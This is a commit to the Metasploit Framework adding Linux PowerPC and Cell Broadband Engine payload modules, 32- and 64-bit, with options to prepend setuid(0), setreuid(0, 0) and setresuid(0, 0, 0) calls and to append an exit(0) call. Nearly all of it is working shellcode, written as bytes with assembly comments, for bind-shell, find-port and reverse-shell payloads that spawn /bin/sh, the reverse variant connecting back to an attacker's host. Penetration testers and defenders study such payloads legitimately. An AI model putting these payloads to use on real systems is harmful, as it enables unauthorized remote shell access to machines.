Added Linux Power/Cell Broadband Engine Architecture payload modules and advanced payload options

git-svn-id: file:///home/svn/framework3/trunk@5899 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Ramon de C Valle 2008-11-13 01:57:53 +00:00
parent 73b02f1899
commit dfbf6b34a5
7 changed files with 601 additions and 1 deletions

View File

@ -106,6 +106,50 @@ module Msf::Payload::Linux
end
# Handle all Power/CBEA code here
if (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
# Prepend
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xa5" +# addi r0,r31,-347 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x18" +# addi r0,r31,-488 #
"\x44\xff\xff\x02" # sc #
end
# Append
if (datastore['AppendExit'])
# exit(0)
app << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
"\x44\xff\xff\x02" # sc #
end
end
return (pre + buf + app)
end

View File

@ -0,0 +1,100 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Bind TCP Inline',
'Version' => '$Revision$',
'Description' => 'Listen for a connection and spawn a command shell',
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ ARCH_PPC, ARCH_CBEA ],
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'LPORT' => [ 58, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
"\x3e\xe0\xff\x02" +# lis r23,-254 #
"\x62\xf7\x04\xd2" +# ori r23,r23,1234 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
"\x7c\x36\x0b\x78" +# mr r22,r1 #
"\x97\x21\xff\xfc" +# stwu r25,-4(r1) #
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x03" +# addi r3,r29,-509 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x05" +# addi r3,r29,-507 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x06" +# addi r3,r29,-506 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x75\x1b\x78" +# mr r21,r3 #
"\x7f\x64\xdb\x78" +# mr r4,r27 #
"\x7e\xa3\xab\x78" +# mr r3,r21 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
"\x40\x80\xff\xec" +# bge+ <bndsockcode+148> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <bndsockcode+172> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"/bin/sh"
}
))
end
end

View File

@ -0,0 +1,87 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
require 'msf/core/handler/find_port'
require 'msf/base/sessions/command_shell'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Find Port Inline',
'Version' => '$Revision$',
'Description' => 'Spawn a shell on an established connection',
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ ARCH_PPC, ARCH_CBEA ],
'Handler' => Msf::Handler::FindPort,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'CPORT' => [ 86, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x7c\x3c\x0b\x78" +# mr r28,r1 #
"\x3b\x7d\xfe\x11" +# addi r27,r29,-495 #
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
"\x7c\x3a\x0b\x78" +# mr r26,r1 #
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x3b\xff\x01\xff" +# addi r31,r31,511 #
"\x3b\xff\xfe\x02" +# addi r31,r31,-510 #
"\x38\x21\x01\xff" +# addi r1,r1,511 #
"\x38\x21\xfe\x05" +# addi r1,r1,-507 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x08" +# addi r3,r29,-504 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x3b\x3c\x01\xff" +# addi r25,r28,511 #
"\xa3\x39\xfe\x03" +# lhz r25,-509(r25) #
"\x28\x19\x04\xd2" +# cmplwi r25,1234 #
"\x40\x82\xff\xd0" +# bne+ <fndsockcode+40> #
"\x3b\x1d\xfe\x03" +# addi r24,r29,-509 #
"\x7f\x04\xc3\x78" +# mr r4,r24 #
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x18\xff\xff" +# addic. r24,r24,-1 #
"\x40\x80\xff\xec" +# bge+ <fndsockcode+96> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <fndsockcode+120> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"/bin/sh"
}
))
end
end

View File

@ -0,0 +1,91 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Reverse TCP Inline',
'Version' => '$Revision$',
'Description' => 'Connect back to attacker and spawn a command shell',
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ ARCH_PPC, ARCH_CBEA ],
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'LHOST' => [ [ 54, 58 ], 'ADDR16MSB' ],
'LPORT' => [ 62, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
"\x3e\xe0\x7f\x00" +# lis r23,32512 #
"\x62\xf7\x00\x01" +# ori r23,r23,1 #
"\x3a\xc0\x04\xd2" +# li r22,1234 #
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
"\x93\x61\xff\xfe" +# stw r27,-2(r1) #
"\x7c\x35\x0b\x78" +# mr r21,r1 #
"\x97\x21\xff\xfc" +# stwu r25,-4(r1) #
"\x96\xa1\xff\xfc" +# stwu r21,-4(r1) #
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x04" +# addi r3,r29,-508 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7f\x64\xdb\x78" +# mr r4,r27 #
"\x7f\x43\xd3\x78" +# mr r3,r26 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
"\x40\x80\xff\xec" +# bge+ <cntsockcode+108> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <cntsockcode+132> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"/bin/sh"
}
))
end
end

View File

@ -0,0 +1,100 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Bind TCP Inline',
'Version' => '$Revision$',
'Description' => 'Listen for a connection and spawn a command shell',
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ ARCH_PPC64, ARCH_CBEA64 ],
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'LPORT' => [ 58, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\xfb\x81\xff\xf9" +# stdu r28,-8(r1) #
"\xfb\x61\xff\xf9" +# stdu r27,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
"\x3e\xe0\xff\x02" +# lis r23,-254 #
"\x62\xf7\x04\xd2" +# ori r23,r23,1234 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
"\x7c\x36\x0b\x78" +# mr r22,r1 #
"\xfb\x21\xff\xf9" +# stdu r25,-8(r1) #
"\xfa\xc1\xff\xf9" +# stdu r22,-8(r1) #
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x03" +# addi r3,r29,-509 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x05" +# addi r3,r29,-507 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x06" +# addi r3,r29,-506 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x75\x1b\x78" +# mr r21,r3 #
"\x7f\x64\xdb\x78" +# mr r4,r27 #
"\x7e\xa3\xab\x78" +# mr r3,r21 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
"\x40\x80\xff\xec" +# bge+ <bndsockcode64+148> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <bndsockcode64+172> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"/bin/sh"
}
))
end
end

View File

@ -0,0 +1,87 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
require 'msf/core/handler/find_port'
require 'msf/base/sessions/command_shell'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Find Port Inline',
'Version' => '$Revision$',
'Description' => 'Spawn a shell on an established connection',
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ ARCH_PPC64, ARCH_CBEA64 ],
'Handler' => Msf::Handler::FindPort,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'CPORT' => [ 86, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x7c\x3c\x0b\x78" +# mr r28,r1 #
"\x3b\x7d\xfe\x11" +# addi r27,r29,-495 #
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
"\x7c\x3a\x0b\x78" +# mr r26,r1 #
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
"\xfb\x81\xff\xf9" +# stdu r28,-8(r1) #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\x3b\xff\x01\xff" +# addi r31,r31,511 #
"\x3b\xff\xfe\x02" +# addi r31,r31,-510 #
"\x38\x21\x01\xff" +# addi r1,r1,511 #
"\x38\x21\xfe\x09" +# addi r1,r1,-503 #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x08" +# addi r3,r29,-504 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x3b\x3c\x01\xff" +# addi r25,r28,511 #
"\xa3\x39\xfe\x03" +# lhz r25,-509(r25) #
"\x28\x19\x04\xd2" +# cmplwi r25,1234 #
"\x40\x82\xff\xd0" +# bne+ <fndsockcode64+40> #
"\x3b\x1d\xfe\x03" +# addi r24,r29,-509 #
"\x7f\x04\xc3\x78" +# mr r4,r24 #
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x18\xff\xff" +# addic. r24,r24,-1 #
"\x40\x80\xff\xec" +# bge+ <fndsockcode64+96> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <fndsockcode64+120> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"/bin/sh"
}
))
end
end

View File

@ -0,0 +1,91 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Reverse TCP Inline',
'Version' => '$Revision$',
'Description' => 'Connect back to attacker and spawn a command shell',
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ ARCH_PPC64, ARCH_CBEA64 ],
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'LHOST' => [ [ 54, 58 ], 'ADDR16MSB' ],
'LPORT' => [ 62, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\xfb\x81\xff\xf9" +# stdu r28,-8(r1) #
"\xfb\x61\xff\xf9" +# stdu r27,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
"\x3e\xe0\x7f\x00" +# lis r23,32512 #
"\x62\xf7\x00\x01" +# ori r23,r23,1 #
"\x3a\xc0\x04\xd2" +# li r22,1234 #
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
"\x93\x61\xff\xfe" +# stw r27,-2(r1) #
"\x7c\x35\x0b\x78" +# mr r21,r1 #
"\xfb\x21\xff\xf9" +# stdu r25,-8(r1) #
"\xfa\xa1\xff\xf9" +# stdu r21,-8(r1) #
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x04" +# addi r3,r29,-508 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7f\x64\xdb\x78" +# mr r4,r27 #
"\x7f\x43\xd3\x78" +# mr r3,r26 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
"\x40\x80\xff\xec" +# bge+ <cntsockcode64+108> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <cntsockcode64+132> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"/bin/sh"
}
))
end
end